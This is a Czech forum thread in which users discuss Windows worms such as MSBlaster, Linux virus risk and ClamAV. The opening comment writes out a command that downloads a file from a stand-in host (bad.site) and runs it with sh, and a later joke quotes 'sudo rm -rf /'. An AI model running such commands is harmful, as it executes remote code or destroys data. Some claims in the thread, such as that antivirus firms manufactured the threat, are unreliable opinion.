Koneckonců, v akci může být wget "http://bad.site/virus -O /tmp/virus"; sh /tmp/virus ...

JJ, stačila jedna záplata od Moftu. Taková veselá hříčka .

tak samozřejmě jsem nepoužíval IE , ale FireFox

Ano, to byl to msblaster. Také jsem tehdy chytil tuhle potvoru, měl jsem tehdy z nějakého důvodu ve Windows odstavený firewall (což se ukázalo jako klíčová věc). Ale tenhle červ se dal (v první chvíli, bez informací, o co jde) docela úspěšně eliminovat tím, že se jeho EXE soubor přepsal nějakým jiným (třeba prázdným). Červ pak sice přes port 135 nakoukl do systému, ale když zjistil přítomnost daného souboru, jeho činnost tím skončila.

Jojo, to byl ten, který mne tak štval až jsem přešel na Linux.

Není to tak dávno, co se Windowsy hromadně nakazily pouze surfováním po netu - rozhodně nebylo třeba spouštět žádné .exe. To byl takovej ten virus, co po čase rebootnul systém... je to několik málo let a bylo to opravdu všude.

To je ta méně závažná polovina. Ve skutečnosti je tato díra zajímavější tím, že na ni existoval Windows exploit jak pro script kiddie, kam stačilo zadat pouze cílovou IP adresu a vyskočil vzdálený příkazový řádek. Jmenovalo se to nějak na způsob DCOM RPC Exploit by DarkSideOfKalez.

A tomu restartu šlo zabránit nějakým přepínačem od shutdown, tuším shutdown /k nebo shutdown /i.

ClamAV se výborně hodí pro kontrolu pošty na serveru, ale na desktop jako klasický antivir se nehodí. Je pomalý a pro použití jako on-access scanner ("rezidentní štít") vyžaduje některou z metod integrace do systému (modul Dazuko, AVFS, ClamFS apod.), což není triviální a zatím to snad v žádné distribuci není připraveno.

Na druhou stranu, co se asi stane, až přijde mojí přítelkyni email od kamarádky s přílohou Brad.Pitt.desktop s instrukcemi, ulož na plochu a klikni?

Pak Linux zvítězil

Sory že to oživuji po takovém čase :)

Já nevím, ale ze systémového hlediska byla problematika virů vyřešena na většině operačních systémech té doby v 90 letech kdy se zjistilo že je to chyba :) .... microsoft jako jediný nereagoval, a od té doby se objevují pověsti o tom, že windows obsahují viry protože jsou nejrozšířenější.

Pravdou zůstává, že antivirové firmy se chytli díky jednomu jedinýmu viru a díky super propagaci ( zase odkazuji na historii, jde o to že vytvořili pocit nebezpečí pomocí kvalitní kampaně na kterou skočili snad všechna média a od té doby začali vydělávat... do té doby to byla taková hodně okrajová a poměrně nevýdělečná oblast IT ;) )

Velice rád bych viděl nehipotetickej "virus" na linuxu .... něco co se samo šíří, škodí... možná by stačilo něco co škodí bez přičinění uživatele ... nemyslím věc typu:Ahoj jsem somálský virus: napiš do konzole: sudo rm -rf / ....

Problém s ideiologií vytvářenou na základě toho, že by něco MOHlo vzniknout je opravdu hipotetický, nejde o variabilitu, ale o způsob řešení problému. Pokud by takový virus vzniknul tak velice rychle by byla vytvořena oprava chyby, chyby že vůbec virus funguje!!!